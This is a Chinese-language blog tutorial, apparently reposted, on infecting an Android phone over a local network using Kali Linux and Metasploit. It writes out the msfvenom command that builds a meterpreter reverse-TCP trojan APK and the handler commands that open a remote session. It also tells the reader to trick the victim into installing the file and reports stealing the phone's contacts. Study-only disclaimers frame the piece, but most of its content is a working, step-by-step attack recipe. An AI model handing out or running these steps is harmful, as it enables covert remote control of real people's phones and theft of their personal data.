滲透測試--使用kali入侵局域網手機實驗


聲明本文僅限於技術討論與學習,嚴禁用於非法途徑,否則后果自負。

原理:借助kali的Metasploit滲透測試框架生成遠程木馬,然后感染局域網內Android手機,從而實現對被滲透手機數據的讀取等。

實驗前准備

    kali虛擬機:192.168.0.102(攻擊機)

    win10中間機:用於將kali生成的遠程木馬發送到Android手機中。

    Android手機:192.168.0.105(靶機)

    Xshell4:用於將在kali上生成的遠程木馬從kali中導到win10中間機中。

實驗過程

一、kali生成遠程木馬

  1.利用msfvenom生成木馬病毒,payload選擇android/meterpreter/reverse_tcp,后接kali虛擬機的名字和端口:

    msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.102 LPORT=8888 R > /root/android.apk

      

 

 

  2. 檢查文件的生成:

      

 

二、木馬傳送

  利用win10中的Xshell4將kali中生成的android.apk傳送到指定路徑(本實驗指定路徑為F:\),再誘導Android手機(靶機)安裝。

  1.用Xshell4連接kali虛擬機並將android.apk傳送到指定路徑:

       

 

 

       

 

 

       

 

 

   2.將F盤下的android.apk誘導發送到目標靶機上安裝。

    目標靶機上安裝完成木馬后會出現如下圖標:

      

 

 

 三、目標攻擊

  1.msf監聽

    kali虛擬機終端依次執行以下命令:

      msfconsole        //啟動msfconsole

      use exploit/multi/handler  //加載模塊

      set payload android/meterpreter/reverse_tcp  //選擇payload

      set LHOST 192.168.0.102

      set LPORT 8888

      exploit          //開始執行漏洞,開始監聽,等待目標上線 

    

 

 

   在目標手機上點一下木馬文件(沒有頁面),則可成功建立攻擊會話:

    

 

 

   查看上述文件:

 

上述實驗演示的是竊取目標靶機通訊錄,如果對其他命令感興趣的話可通過help命令自行嘗試。

提醒本實驗僅用於技術討論與學習,嚴禁用於非法途徑,否則后果自負。

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM